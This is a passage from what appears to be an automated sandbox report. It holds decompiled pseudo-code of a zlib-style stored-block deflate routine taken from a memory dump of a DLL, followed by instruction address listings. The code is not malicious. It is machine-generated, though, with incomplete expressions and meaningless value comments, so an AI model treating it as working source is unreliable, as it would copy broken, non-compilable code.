                                                                                                                                                                          				void* _t258;
                                                                                                                                                                          				int _t259;
                                                                                                                                                                          				intOrPtr _t260;
                                                                                                                                                                          				int _t261;
                                                                                                                                                                          				signed int _t269;
                                                                                                                                                                          				signed int _t271;
                                                                                                                                                                          				intOrPtr* _t272;
                                                                                                                                                                          				void* _t273;
                                                                                                                                                                          
                                                                                                                                                                          				_t253 = _a8;
                                                                                                                                                                          				_t272 = _a4;
                                                                                                                                                                          				_t3 = _t272 + 0xc; // 0x452bf84d
                                                                                                                                                                          				_t4 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                          				_t228 =  *_t4;
                                                                                                                                                                          				_t137 =  *_t3 + 0xfffffffb;
                                                                                                                                                                          				_t229 =  <=  ? _t137 : _t228;
                                                                                                                                                                          				_v16 =  <=  ? _t137 : _t228;
                                                                                                                                                                          				_t269 = 0;
                                                                                                                                                                          				_a4 =  *((intOrPtr*)( *_t272 + 4));
                                                                                                                                                                          				asm("o16 nop [eax+eax]");
                                                                                                                                                                          				while(1) {
                                                                                                                                                                          					_t8 = _t272 + 0x16bc; // 0x40f8458b
                                                                                                                                                                          					_t141 =  *_t8 + 0x2a >> 3;
                                                                                                                                                                          					_v12 = 0xffff;
                                                                                                                                                                          					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                                                                                                                                                                          					if(_t217 < _t141) {
                                                                                                                                                                          						break;
                                                                                                                                                                          					}
                                                                                                                                                                          					_t11 = _t272 + 0x6c; // 0x20fd8a1
                                                                                                                                                                          					_t12 = _t272 + 0x5c; // 0x38e85000
                                                                                                                                                                          					_t245 =  *_t11 -  *_t12;
                                                                                                                                                                          					_v8 = _t245;
                                                                                                                                                                          					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                                                                                                                                                                          					_t247 =  <  ? _t195 : _v12;
                                                                                                                                                                          					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                                                                                                                                                                          					if(_t227 >= _v16) {
                                                                                                                                                                          						L7:
                                                                                                                                                                          						if(_t253 != 4) {
                                                                                                                                                                          							L10:
                                                                                                                                                                          							_t269 = 0;
                                                                                                                                                                          							__eflags = 0;
                                                                                                                                                                          						} else {
                                                                                                                                                                          							_t285 = _t227 - _t195;
                                                                                                                                                                          							if(_t227 != _t195) {
                                                                                                                                                                          								goto L10;
                                                                                                                                                                          							} else {
                                                                                                                                                                          								_t269 = _t253 - 3;
                                                                                                                                                                          							}
                                                                                                                                                                          						}
                                                                                                                                                                          						E10017D00(_t272, _t272, 0, 0, _t269);
                                                                                                                                                                          						_t18 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                          						_t19 = _t272 + 8; // 0x8d000040
                                                                                                                                                                          						 *( *_t18 +  *_t19 - 4) = _t227;
                                                                                                                                                                          						_t22 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                          						_t23 = _t272 + 8; // 0x8d000040
                                                                                                                                                                          						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                                                                                                                                                                          						_t26 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                          						_t27 = _t272 + 8; // 0x8d000040
                                                                                                                                                                          						 *( *_t26 +  *_t27 - 2) =  !_t227;
                                                                                                                                                                          						_t30 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                          						_t31 = _t272 + 8; // 0x8d000040
                                                                                                                                                                          						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                                                                                                                                                                          						E10016A60(_t285,  *_t272);
                                                                                                                                                                          						_t202 = _v8;
                                                                                                                                                                          						_t273 = _t273 + 0x14;
                                                                                                                                                                          						if(_t202 != 0) {
                                                                                                                                                                          							_t208 =  >  ? _t227 : _t202;
                                                                                                                                                                          							_v8 = _t208;
                                                                                                                                                                          							_t36 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                          							_t37 = _t272 + 0x5c; // 0x38e85000
                                                                                                                                                                          							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                                                                                                                                                                          							_t273 = _t273 + 0xc;
                                                                                                                                                                          							_t252 = _v8;
                                                                                                                                                                          							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                                                                                                                                                                          							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                                                                                                                                                                          							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                                                                                                                                                                          							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                                                                                                                                                                          							_t227 = _t227 - _t252;
                                                                                                                                                                          						}
                                                                                                                                                                          						if(_t227 != 0) {
                                                                                                                                                                          							E10016BA0( *_t272,  *( *_t272 + 0xc), _t227);
                                                                                                                                                                          							_t273 = _t273 + 0xc;
                                                                                                                                                                          							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                                                                                                                                                                          							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                                                                                                                                                                          							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                                                                                                                                                                          						}
                                                                                                                                                                          						_t253 = _a8;
                                                                                                                                                                          						if(_t269 == 0) {
                                                                                                                                                                          							continue;
                                                                                                                                                                          						}
                                                                                                                                                                          					} else {
                                                                                                                                                                          						if(_t227 != 0 || _t253 == 4) {
                                                                                                                                                                          							if(_t253 != 0 && _t227 == _t195) {
                                                                                                                                                                          								goto L7;
                                                                                                                                                                          							}
                                                                                                                                                                          						}
                                                                                                                                                                          					}
                                                                                                                                                                          					break;
                                                                                                                                                                          				}
                                                                                                                                                                          				_t142 =  *_t272;
                                                                                                                                                                          				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                                                                                                                                                                          				_a4 = _t232;
                                                                                                                                                                          				if(_t232 == 0) {
                                                                                                                                                                          					_t83 = _t272 + 0x6c; // 0x20fd8a1
                                                                                                                                                                          					_t254 =  *_t83;
                                                                                                                                                                          				} else {
                                                                                                                                                                          					_t59 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                          					_t224 =  *_t59;
                                                                                                                                                                          					if(_t232 < _t224) {
                                                                                                                                                                          						_t65 = _t272 + 0x3c; // 0x830cc483
                                                                                                                                                                          						_t66 = _t272 + 0x6c; // 0x20fd8a1
                                                                                                                                                                          						_t260 =  *_t66;
                                                                                                                                                                          						__eflags =  *_t65 - _t260 - _t232;
                                                                                                                                                                          						if( *_t65 - _t260 <= _t232) {
                                                                                                                                                                          							_t67 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                          							_t261 = _t260 - _t224;
                                                                                                                                                                          							 *(_t272 + 0x6c) = _t261;
                                                                                                                                                                          							memcpy( *_t67,  *_t67 + _t224, _t261);
                                                                                                                                                                          							_t70 = _t272 + 0x16b0; // 0x1488087d
                                                                                                                                                                          							_t188 =  *_t70;
                                                                                                                                                                          							_t273 = _t273 + 0xc;
                                                                                                                                                                          							_t232 = _a4;
                                                                                                                                                                          							__eflags = _t188 - 2;
                                                                                                                                                                          							if(_t188 < 2) {
                                                                                                                                                                          								_t189 = _t188 + 1;
                                                                                                                                                                          								__eflags = _t189;
                                                                                                                                                                          								 *(_t272 + 0x16b0) = _t189;
                                                                                                                                                                          							}
                                                                                                                                                                          						}
                                                                                                                                                                          						_t73 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                          						_t74 = _t272 + 0x6c; // 0x20fd8a1
                                                                                                                                                                          						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                                                                                                                                                                          						_t225 = _a4;
                                                                                                                                                                          						_t273 = _t273 + 0xc;
                                                                                                                                                                          						_t76 = _t272 + 0x6c;
                                                                                                                                                                          						 *_t76 =  *(_t272 + 0x6c) + _t225;
                                                                                                                                                                          						__eflags =  *_t76;
                                                                                                                                                                          						_t78 = _t272 + 0x6c; // 0x20fd8a1
                                                                                                                                                                          						_t184 =  *_t78;
                                                                                                                                                                          						_t79 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                          						_t239 =  *_t79;
                                                                                                                                                                          					} else {
                                                                                                                                                                          						 *(_t272 + 0x16b0) = 2;
                                                                                                                                                                          						_t61 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                          						memcpy( *_t61,  *_t142 - _t224, _t224);
                                                                                                                                                                          						_t62 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                          						_t184 =  *_t62;
                                                                                                                                                                          						_t273 = _t273 + 0xc;
                                                                                                                                                                          						_t225 = _a4;
                                                                                                                                                                          						_t239 = _t184;
                                                                                                                                                                          						 *(_t272 + 0x6c) = _t184;
                                                                                                                                                                          					}
                                                                                                                                                                          					_t254 = _t184;
                                                                                                                                                                          					 *(_t272 + 0x5c) = _t184;
                                                                                                                                                                          					_t81 = _t272 + 0x16b4; // 0xff4d8a39
                                                                                                                                                                          					_t185 =  *_t81;
                                                                                                                                                                          					_t240 = _t239 - _t185;
                                                                                                                                                                          					_t241 =  <=  ? _t225 : _t240;
                                                                                                                                                                          					_t242 = ( <=  ? _t225 : _t240) + _t185;
                                                                                                                                                                          					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                                                                                                                                                                          				}
                                                                                                                                                                          				if( *(_t272 + 0x16c0) < _t254) {
                                                                                                                                                                          					 *(_t272 + 0x16c0) = _t254;
                                                                                                                                                                          				}
                                                                                                                                                                          				if(_t269 == 0) {
                                                                                                                                                                          					_t218 = _a8;
                                                                                                                                                                          					__eflags = _t218;
                                                                                                                                                                          					if(_t218 == 0) {
                                                                                                                                                                          						L34:
                                                                                                                                                                          						_t89 = _t272 + 0x3c; // 0x830cc483
                                                                                                                                                                          						_t219 =  *_t272;
                                                                                                                                                                          						_t145 =  *_t89 - _t254 - 1;
                                                                                                                                                                          						_a4 =  *_t272;
                                                                                                                                                                          						_t234 = _t254;
                                                                                                                                                                          						_v16 = _t145;
                                                                                                                                                                          						_v8 = _t254;
                                                                                                                                                                          						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                                                                                                                                                                          						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                                                                                                                                                                          							_v8 = _t254;
                                                                                                                                                                          							_t95 = _t272 + 0x5c; // 0x38e85000
                                                                                                                                                                          							_a4 = _t219;
                                                                                                                                                                          							_t234 = _t254;
                                                                                                                                                                          							_t97 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                          							__eflags =  *_t95 -  *_t97;
                                                                                                                                                                          							if( *_t95 >=  *_t97) {
                                                                                                                                                                          								_t98 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                          								_t167 =  *_t98;
                                                                                                                                                                          								_t259 = _t254 - _t167;
                                                                                                                                                                          								_t99 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                          								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                                                                                                                                                                          								 *(_t272 + 0x6c) = _t259;
                                                                                                                                                                          								memcpy( *_t99, _t167 +  *_t99, _t259);
                                                                                                                                                                          								_t103 = _t272 + 0x16b0; // 0x1488087d
                                                                                                                                                                          								_t170 =  *_t103;
                                                                                                                                                                          								_t273 = _t273 + 0xc;
                                                                                                                                                                          								__eflags = _t170 - 2;
                                                                                                                                                                          								if(_t170 < 2) {
                                                                                                                                                                          									_t172 = _t170 + 1;
                                                                                                                                                                          									__eflags = _t172;
                                                                                                                                                                          									 *(_t272 + 0x16b0) = _t172;
                                                                                                                                                                          								}
                                                                                                                                                                          								_t106 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                          								_t145 = _v16 +  *_t106;
                                                                                                                                                                          								__eflags = _t145;
                                                                                                                                                                          								_a4 =  *_t272;
                                                                                                                                                                          								_t108 = _t272 + 0x6c; // 0x20fd8a1
                                                                                                                                                                          								_t234 =  *_t108;
                                                                                                                                                                          								_v8 = _t234;
                                                                                                                                                                          							}
                                                                                                                                                                          						}
                                                                                                                                                                          						_t255 = _a4;
                                                                                                                                                                          						_t220 =  *((intOrPtr*)(_a4 + 4));
                                                                                                                                                                          						__eflags = _t145 - _t220;
                                                                                                                                                                          						_t221 =  <=  ? _t145 : _t220;
                                                                                                                                                                          						_t146 = _t221;
                                                                                                                                                                          						_a4 = _t221;
                                                                                                                                                                          						_t222 = _a8;
                                                                                                                                                                          						__eflags = _t146;
                                                                                                                                                                          						if(_t146 != 0) {
                                                                                                                                                                          							_t114 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                          							E10016BA0(_t255,  *_t114 + _v8, _t146);
                                                                                                                                                                          							_t273 = _t273 + 0xc;
                                                                                                                                                                          							_t117 = _t272 + 0x6c;
                                                                                                                                                                          							 *_t117 =  *(_t272 + 0x6c) + _a4;
                                                                                                                                                                          							__eflags =  *_t117;
                                                                                                                                                                          							_t119 = _t272 + 0x6c; // 0x20fd8a1
                                                                                                                                                                          							_t234 =  *_t119;
                                                                                                                                                                          						}
                                                                                                                                                                          						__eflags =  *(_t272 + 0x16c0) - _t234;
                                                                                                                                                                          						if( *(_t272 + 0x16c0) < _t234) {
                                                                                                                                                                          							 *(_t272 + 0x16c0) = _t234;
                                                                                                                                                                          						}
                                                                                                                                                                          						_t122 = _t272 + 0x16bc; // 0x40f8458b
                                                                                                                                                                          						_t123 = _t272 + 0xc; // 0x452bf84d
                                                                                                                                                                          						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                                                                                                                                                                          						__eflags = _t257 - 0xffff;
                                                                                                                                                                          						_t258 =  >  ? 0xffff : _t257;
                                                                                                                                                                          						_t124 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                          						_t151 =  *_t124;
                                                                                                                                                                          						_t125 = _t272 + 0x5c; // 0x38e85000
                                                                                                                                                                          						_t235 = _t234 -  *_t125;
                                                                                                                                                                          						__eflags = _t258 - _t151;
                                                                                                                                                                          						_t152 =  <=  ? _t258 : _t151;
                                                                                                                                                                          						__eflags = _t235 - ( <=  ? _t258 : _t151);
                                                                                                                                                                          						if(_t235 >= ( <=  ? _t258 : _t151)) {
                                                                                                                                                                          							L49:
                                                                                                                                                                          							__eflags = _t235 - _t258;
                                                                                                                                                                          							_t154 =  >  ? _t258 : _t235;
                                                                                                                                                                          							_a4 =  >  ? _t258 : _t235;
                                                                                                                                                                          							__eflags = _t222 - 4;
                                                                                                                                                                          							if(_t222 != 4) {
                                                                                                                                                                          								L53:
                                                                                                                                                                          								_t269 = 0;
                                                                                                                                                                          								__eflags = 0;
                                                                                                                                                                          							} else {
                                                                                                                                                                          								_t161 =  *_t272;
                                                                                                                                                                          								__eflags =  *(_t161 + 4);
                                                                                                                                                                          								_t154 = _a4;
                                                                                                                                                                          								if( *(_t161 + 4) != 0) {
                                                                                                                                                                          									goto L53;
                                                                                                                                                                          								} else {
                                                                                                                                                                          									__eflags = _t154 - _t235;
                                                                                                                                                                          									if(_t154 != _t235) {
                                                                                                                                                                          										goto L53;
                                                                                                                                                                          									} else {
                                                                                                                                                                          										_t269 = _t222 - 3;
                                                                                                                                                                          									}
                                                                                                                                                                          								}
                                                                                                                                                                          							}
                                                                                                                                                                          							_t131 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                          							_t132 = _t272 + 0x5c; // 0x38e85000
                                                                                                                                                                          							E10017D00(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                                                                                                                                                                          							_t134 = _t272 + 0x5c;
                                                                                                                                                                          							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                                                                                                                                                          							__eflags =  *_t134;
                                                                                                                                                                          							E10016A60( *_t134,  *_t272);
                                                                                                                                                                          						} else {
                                                                                                                                                                          							__eflags = _t235;
                                                                                                                                                                          							if(_t235 != 0) {
                                                                                                                                                                          								L46:
                                                                                                                                                                          								__eflags = _t222;
                                                                                                                                                                          								if(_t222 != 0) {
                                                                                                                                                                          									_t162 =  *_t272;
                                                                                                                                                                          									__eflags =  *(_t162 + 4);
                                                                                                                                                                          									if( *(_t162 + 4) == 0) {
                                                                                                                                                                          										__eflags = _t235 - _t258;
                                                                                                                                                                          										if(_t235 <= _t258) {
                                                                                                                                                                          											goto L49;
                                                                                                                                                                          										}
                                                                                                                                                                          									}
                                                                                                                                                                          								}
                                                                                                                                                                          							} else {
                                                                                                                                                                          								__eflags = _t222 - 4;
                                                                                                                                                                          								if(_t222 == 4) {
                                                                                                                                                                          									goto L46;
                                                                                                                                                                          								}
                                                                                                                                                                          							}
                                                                                                                                                                          						}
                                                                                                                                                                          						asm("sbb edi, edi");
                                                                                                                                                                          						_t271 =  ~_t269 & 0x00000002;
                                                                                                                                                                          						__eflags = _t271;
                                                                                                                                                                          						return _t271;
                                                                                                                                                                          					} else {
                                                                                                                                                                          						__eflags = _t218 - 4;
                                                                                                                                                                          						if(_t218 == 4) {
                                                                                                                                                                          							goto L34;
                                                                                                                                                                          						} else {
                                                                                                                                                                          							_t173 =  *_t272;
                                                                                                                                                                          							__eflags =  *(_t173 + 4);
                                                                                                                                                                          							if( *(_t173 + 4) != 0) {
                                                                                                                                                                          								goto L34;
                                                                                                                                                                          							} else {
                                                                                                                                                                          								_t88 = _t272 + 0x5c; // 0x38e85000
                                                                                                                                                                          								__eflags = _t254 -  *_t88;
                                                                                                                                                                          								if(_t254 !=  *_t88) {
                                                                                                                                                                          									goto L34;
                                                                                                                                                                          								} else {
                                                                                                                                                                          									return 1;
                                                                                                                                                                          								}
                                                                                                                                                                          							}
                                                                                                                                                                          						}
                                                                                                                                                                          					}
                                                                                                                                                                          				} else {
                                                                                                                                                                          					return 3;
                                                                                                                                                                          				}
                                                                                                                                                                          			}






















































                                                                                                                                                                          0x10014ce6
                                                                                                                                                                          0x10014ceb
                                                                                                                                                                          0x10014cef
                                                                                                                                                                          0x10014cf2
                                                                                                                                                                          0x10014cf2
                                                                                                                                                                          0x10014cf5
                                                                                                                                                                          0x10014cfa
                                                                                                                                                                          0x10014cff
                                                                                                                                                                          0x10014d02
                                                                                                                                                                          0x10014d07
                                                                                                                                                                          0x10014d0a
                                                                                                                                                                          0x10014d10
                                                                                                                                                                          0x10014d10
                                                                                                                                                                          0x10014d1b
                                                                                                                                                                          0x10014d1e
                                                                                                                                                                          0x10014d25
                                                                                                                                                                          0x10014d2a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10014d30
                                                                                                                                                                          0x10014d35
                                                                                                                                                                          0x10014d35
                                                                                                                                                                          0x10014d3a
                                                                                                                                                                          0x10014d40
                                                                                                                                                                          0x10014d4a
                                                                                                                                                                          0x10014d4f
                                                                                                                                                                          0x10014d55
                                                                                                                                                                          0x10014d74
                                                                                                                                                                          0x10014d77
                                                                                                                                                                          0x10014d82
                                                                                                                                                                          0x10014d82
                                                                                                                                                                          0x10014d82
                                                                                                                                                                          0x10014d79
                                                                                                                                                                          0x10014d79
                                                                                                                                                                          0x10014d7b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10014d7d
                                                                                                                                                                          0x10014d7d
                                                                                                                                                                          0x10014d7d
                                                                                                                                                                          0x10014d7b
                                                                                                                                                                          0x10014d8a
                                                                                                                                                                          0x10014d8f
                                                                                                                                                                          0x10014d94
                                                                                                                                                                          0x10014d9a
                                                                                                                                                                          0x10014d9e
                                                                                                                                                                          0x10014da1
                                                                                                                                                                          0x10014da4
                                                                                                                                                                          0x10014daa
                                                                                                                                                                          0x10014daf
                                                                                                                                                                          0x10014db2
                                                                                                                                                                          0x10014db8
                                                                                                                                                                          0x10014dbd
                                                                                                                                                                          0x10014dc3
                                                                                                                                                                          0x10014dc9
                                                                                                                                                                          0x10014dce
                                                                                                                                                                          0x10014dd1
                                                                                                                                                                          0x10014dd6
                                                                                                                                                                          0x10014dda
                                                                                                                                                                          0x10014dde
                                                                                                                                                                          0x10014de1
                                                                                                                                                                          0x10014de4
                                                                                                                                                                          0x10014ded
                                                                                                                                                                          0x10014df4
                                                                                                                                                                          0x10014df7
                                                                                                                                                                          0x10014dfa
                                                                                                                                                                          0x10014dff
                                                                                                                                                                          0x10014e04
                                                                                                                                                                          0x10014e07
                                                                                                                                                                          0x10014e0a
                                                                                                                                                                          0x10014e0a
                                                                                                                                                                          0x10014e0e
                                                                                                                                                                          0x10014e17
                                                                                                                                                                          0x10014e1e
                                                                                                                                                                          0x10014e21
                                                                                                                                                                          0x10014e26
                                                                                                                                                                          0x10014e2b
                                                                                                                                                                          0x10014e2b
                                                                                                                                                                          0x10014e2e
                                                                                                                                                                          0x10014e33
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10014d57
                                                                                                                                                                          0x10014d59
                                                                                                                                                                          0x10014d66
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10014d66
                                                                                                                                                                          0x10014d59
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10014d55
                                                                                                                                                                          0x10014e39
                                                                                                                                                                          0x10014e3e
                                                                                                                                                                          0x10014e41
                                                                                                                                                                          0x10014e44
                                                                                                                                                                          0x10014eef
                                                                                                                                                                          0x10014eef
                                                                                                                                                                          0x10014e4a
                                                                                                                                                                          0x10014e4a
                                                                                                                                                                          0x10014e4a
                                                                                                                                                                          0x10014e4f
                                                                                                                                                                          0x10014e79
                                                                                                                                                                          0x10014e7c
                                                                                                                                                                          0x10014e7c
                                                                                                                                                                          0x10014e81
                                                                                                                                                                          0x10014e83
                                                                                                                                                                          0x10014e85
                                                                                                                                                                          0x10014e88
                                                                                                                                                                          0x10014e8b
                                                                                                                                                                          0x10014e93
                                                                                                                                                                          0x10014e98
                                                                                                                                                                          0x10014e98
                                                                                                                                                                          0x10014e9e
                                                                                                                                                                          0x10014ea1
                                                                                                                                                                          0x10014ea4
                                                                                                                                                                          0x10014ea7
                                                                                                                                                                          0x10014ea9
                                                                                                                                                                          0x10014ea9
                                                                                                                                                                          0x10014eaa
                                                                                                                                                                          0x10014eaa
                                                                                                                                                                          0x10014ea7
                                                                                                                                                                          0x10014eb8
                                                                                                                                                                          0x10014ebb
                                                                                                                                                                          0x10014ebf
                                                                                                                                                                          0x10014ec4
                                                                                                                                                                          0x10014ec7
                                                                                                                                                                          0x10014eca
                                                                                                                                                                          0x10014eca
                                                                                                                                                                          0x10014eca
                                                                                                                                                                          0x10014ecd
                                                                                                                                                                          0x10014ecd
                                                                                                                                                                          0x10014ed0
                                                                                                                                                                          0x10014ed0
                                                                                                                                                                          0x10014e51
                                                                                                                                                                          0x10014e51
                                                                                                                                                                          0x10014e61
                                                                                                                                                                          0x10014e64
                                                                                                                                                                          0x10014e69
                                                                                                                                                                          0x10014e69
                                                                                                                                                                          0x10014e6c
                                                                                                                                                                          0x10014e6f
                                                                                                                                                                          0x10014e72
                                                                                                                                                                          0x10014e74
                                                                                                                                                                          0x10014e74
                                                                                                                                                                          0x10014ed3
                                                                                                                                                                          0x10014ed5
                                                                                                                                                                          0x10014ed8
                                                                                                                                                                          0x10014ed8
                                                                                                                                                                          0x10014ede
                                                                                                                                                                          0x10014ee2
                                                                                                                                                                          0x10014ee5
                                                                                                                                                                          0x10014ee7
                                                                                                                                                                          0x10014ee7
                                                                                                                                                                          0x10014ef8
                                                                                                                                                                          0x10014efa
                                                                                                                                                                          0x10014efa
                                                                                                                                                                          0x10014f02
                                                                                                                                                                          0x10014f10
                                                                                                                                                                          0x10014f13
                                                                                                                                                                          0x10014f15
                                                                                                                                                                          0x10014f35
                                                                                                                                                                          0x10014f35
                                                                                                                                                                          0x10014f38
                                                                                                                                                                          0x10014f3e
                                                                                                                                                                          0x10014f3f
                                                                                                                                                                          0x10014f42
                                                                                                                                                                          0x10014f44
                                                                                                                                                                          0x10014f47
                                                                                                                                                                          0x10014f4a
                                                                                                                                                                          0x10014f4d
                                                                                                                                                                          0x10014f51
                                                                                                                                                                          0x10014f54
                                                                                                                                                                          0x10014f57
                                                                                                                                                                          0x10014f5a
                                                                                                                                                                          0x10014f5c
                                                                                                                                                                          0x10014f5c
                                                                                                                                                                          0x10014f5f
                                                                                                                                                                          0x10014f61
                                                                                                                                                                          0x10014f61
                                                                                                                                                                          0x10014f64
                                                                                                                                                                          0x10014f66
                                                                                                                                                                          0x10014f69
                                                                                                                                                                          0x10014f71
                                                                                                                                                                          0x10014f74
                                                                                                                                                                          0x10014f79
                                                                                                                                                                          0x10014f79
                                                                                                                                                                          0x10014f7f
                                                                                                                                                                          0x10014f82
                                                                                                                                                                          0x10014f85
                                                                                                                                                                          0x10014f87
                                                                                                                                                                          0x10014f87
                                                                                                                                                                          0x10014f88
                                                                                                                                                                          0x10014f88
                                                                                                                                                                          0x10014f93
                                                                                                                                                                          0x10014f93
                                                                                                                                                                          0x10014f93
                                                                                                                                                                          0x10014f96
                                                                                                                                                                          0x10014f99
                                                                                                                                                                          0x10014f99
                                                                                                                                                                          0x10014f9c
                                                                                                                                                                          0x10014f9c
                                                                                                                                                                          0x10014f5f
                                                                                                                                                                          0x10014f9f
                                                                                                                                                                          0x10014fa2
                                                                                                                                                                          0x10014fa5
                                                                                                                                                                          0x10014fa7
                                                                                                                                                                          0x10014faa
                                                                                                                                                                          0x10014fac
                                                                                                                                                                          0x10014faf
                                                                                                                                                                          0x10014fb2
                                                                                                                                                                          0x10014fb4
                                                                                                                                                                          0x10014fb7
                                                                                                                                                                          0x10014fbf
                                                                                                                                                                          0x10014fc7
                                                                                                                                                                          0x10014fca
                                                                                                                                                                          0x10014fca
                                                                                                                                                                          0x10014fca
                                                                                                                                                                          0x10014fcd
                                                                                                                                                                          0x10014fcd
                                                                                                                                                                          0x10014fcd
                                                                                                                                                                          0x10014fd0
                                                                                                                                                                          0x10014fd6
                                                                                                                                                                          0x10014fd8
                                                                                                                                                                          0x10014fd8
                                                                                                                                                                          0x10014fde
                                                                                                                                                                          0x10014fe4
                                                                                                                                                                          0x10014fed
                                                                                                                                                                          0x10014ff4
                                                                                                                                                                          0x10014ff6
                                                                                                                                                                          0x10014ff9
                                                                                                                                                                          0x10014ff9
                                                                                                                                                                          0x10014ffc
                                                                                                                                                                          0x10014ffc
                                                                                                                                                                          0x10014fff
                                                                                                                                                                          0x10015001
                                                                                                                                                                          0x10015004
                                                                                                                                                                          0x10015006
                                                                                                                                                                          0x10015021
                                                                                                                                                                          0x10015021
                                                                                                                                                                          0x10015025
                                                                                                                                                                          0x10015028
                                                                                                                                                                          0x1001502b
                                                                                                                                                                          0x1001502e
                                                                                                                                                                          0x10015044
                                                                                                                                                                          0x10015044
                                                                                                                                                                          0x10015044
                                                                                                                                                                          0x10015030
                                                                                                                                                                          0x10015030
                                                                                                                                                                          0x10015032
                                                                                                                                                                          0x10015036
                                                                                                                                                                          0x10015039
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001503b
                                                                                                                                                                          0x1001503b
                                                                                                                                                                          0x1001503d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001503f
                                                                                                                                                                          0x1001503f
                                                                                                                                                                          0x1001503f
                                                                                                                                                                          0x1001503d
                                                                                                                                                                          0x10015039
                                                                                                                                                                          0x10015048
                                                                                                                                                                          0x1001504b
                                                                                                                                                                          0x10015050
                                                                                                                                                                          0x1001505a
                                                                                                                                                                          0x1001505a
                                                                                                                                                                          0x1001505a
                                                                                                                                                                          0x1001505d
                                                                                                                                                                          0x10015008
                                                                                                                                                                          0x10015008
                                                                                                                                                                          0x1001500a
                                                                                                                                                                          0x10015011
                                                                                                                                                                          0x10015011
                                                                                                                                                                          0x10015013
                                                                                                                                                                          0x10015015
                                                                                                                                                                          0x10015017
                                                                                                                                                                          0x1001501b
                                                                                                                                                                          0x1001501d
                                                                                                                                                                          0x1001501f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001501f
                                                                                                                                                                          0x1001501b
                                                                                                                                                                          0x1001500c
                                                                                                                                                                          0x1001500c
                                                                                                                                                                          0x1001500f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001500f
                                                                                                                                                                          0x1001500a
                                                                                                                                                                          0x10015067
                                                                                                                                                                          0x10015069
                                                                                                                                                                          0x10015069
                                                                                                                                                                          0x10015074
                                                                                                                                                                          0x10014f17
                                                                                                                                                                          0x10014f17
                                                                                                                                                                          0x10014f1a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10014f1c
                                                                                                                                                                          0x10014f1c
                                                                                                                                                                          0x10014f1e
                                                                                                                                                                          0x10014f22
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10014f24
                                                                                                                                                                          0x10014f24
                                                                                                                                                                          0x10014f24
                                                                                                                                                                          0x10014f27
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10014f2b
                                                                                                                                                                          0x10014f34
                                                                                                                                                                          0x10014f34
                                                                                                                                                                          0x10014f27
                                                                                                                                                                          0x10014f22
                                                                                                                                                                          0x10014f1a
                                                                                                                                                                          0x10014f06
                                                                                                                                                                          0x10014f0f
                                                                                                                                                                          0x10014f0f

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
